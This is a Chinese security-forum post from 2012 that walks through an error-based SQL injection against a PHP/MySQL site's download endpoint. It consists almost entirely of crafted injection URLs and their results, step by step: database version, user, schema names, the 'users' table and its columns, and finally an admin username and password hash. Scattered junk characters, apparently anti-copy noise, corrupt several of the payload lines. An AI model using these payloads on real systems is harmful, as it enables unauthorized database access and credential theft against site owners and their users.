找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2046|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
$ I) C% W+ r7 D: ^! s! d6 V! N5 c2 S7 ~7 Y$ F/ F( R' _) ]
之前想找个测试 没想到这有 可以测试下做个记录而已 5 J# @5 p& M$ y/ F# S

% s& p+ I1 S. ^" F- `http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
3 [) b9 o+ M# E" n
* J. Q. h6 t* D2 U( [. C6 g+ i. _& B, f/data0/htdocs/leqi_new/app/myapp.php
) q. G5 t9 B8 z2 R
1 F8 @0 Z% b5 `. G; w 或者: d, q9 ]0 I7 R  s0 o

" x1 v; I. P! l6 \" g! Y/**********version()**********/ 5.1.49-log: _1 d0 Q6 e, M7 V, F
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- Y3 p) r# H: \1 ^. O' W

% t$ G- {9 ~# o( P8 V' E/ J8 G# P2 O/**********user()**********/  
# g4 l* J. Y; b0 B$ ^& S' ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003  x% o5 L% l+ l% A# U$ t9 P

& y) R% }9 D( q/**********database()**********/  leqi+ o( D; o0 ]+ i8 {9 J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
+ k5 @  A; j0 ~* d/ @- w. U
- ?/ Q' n+ s" T! F. R% P/**********limit依次递归爆库**********/
' L, e5 _8 f$ Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) T% q# a) R. O% E" N- X
information_schema
( ], E9 ]1 P8 ^* `# K( ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% M" w3 @5 Y2 f. s" ]
leqi
  ^5 R' ^* q4 Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003$ L/ `* c1 I. [5 s& i/ _( F# R; p
test' _5 F: w: T. E6 E- D9 \& l3 ^( L

4 F! m! V* N9 n3 I/**********limit依次递归爆表名**********/
) a6 A- ]) o# phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) o. F/ @4 z8 f3 y' u/ w$ h' Y. q4 uusers
: F0 t" O! R* |& E0 q4 F7 Z; E7 r# w
  c2 T7 ^/ v  g+ ~% C  _/**********limit依次递归爆字段名**********/, L# X+ P7 i- o8 Q6 }0 z- U; ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003' D+ j. _, K, P
user_id,username,nickname,passwd,group_id
. R- P+ X2 h* h0 S# r) @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
# r- U3 ?; l/ A/wapc/5000_0005_0033 k$ w' h* Y/ s+ V3 H
11 216 S- z8 [. j: D6 e3 D0 l2 ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%235 m3 x, g, g/ p
/wapc/5000_0005_003
) f4 d# A+ a. l+ W5 }5 l( t7 @11 341 351 3610 d5 l- J  _$ U: K. C
/**********爆数据**********/
# v1 T  t$ w% U% y: G, V) o- @5 Mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23# h* C8 r2 i6 D; e  |3 N
admin- R7 L" M! P( b+ z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% _) A7 }/ x, ]" q0 A6a8b4574ca231eb8bd52764d4978ffcd0 `9 ]* |1 i, g8 T# `
! Q! r8 G! X0 O

. B+ z+ @# ~! A8 O/ L0 E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表